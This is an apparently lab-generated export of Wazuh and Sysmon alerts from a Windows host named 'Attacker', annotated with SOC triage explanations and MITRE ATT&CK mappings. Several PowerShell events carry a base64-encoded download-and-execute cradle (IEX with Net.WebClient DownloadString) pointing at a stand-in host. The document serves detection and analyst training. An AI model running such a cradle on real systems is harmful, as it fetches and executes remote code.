No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11932
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:46.007+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:46.007+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534206.794207
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:33:51.4872058Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  280774
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:33:51.481 ProcessGuid: {94294ddc-bc4e-680a-450a-000000000e00} ProcessId: 9340 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_iirz44hw.ut4.ps1 CreationUtcTime: 2025-04-24 22:33:51.481 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:33:51.481
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc4e-680a-450a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9340
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_iirz44hw.ut4.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:33:51.481
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:46.378+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:46.378+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534206.796971
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:33:59.8990721Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  280869
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:33:58.812 ProcessGuid: {94294ddc-bc56-680a-4d0a-000000000e00} ProcessId: 10156 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bc54-680a-4a0a-000000000e00} ParentProcessId: 12404 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:33:58.812
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc56-680a-4d0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10156
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bc54-680a-4a0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  12404
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:46.379+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:46.379+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  9
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534206.805041
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:34:00.0990056Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  280870
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:34:00.059 ProcessGuid: {94294ddc-bc56-680a-4d0a-000000000e00} ProcessId: 10156 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_e3qarsmw.y43.ps1 CreationUtcTime: 2025-04-24 22:34:00.059 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:34:00.059
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc56-680a-4d0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10156
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_e3qarsmw.y43.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:34:00.059
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:46.609+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:46.609+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534206.807809
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:34:04.5719304Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  280933
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:34:03.416 ProcessGuid: {94294ddc-bc5b-680a-510a-000000000e00} ProcessId: 8180 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bc59-680a-4f0a-000000000e00} ParentProcessId: 11636 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:34:03.416
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc5b-680a-510a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8180
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
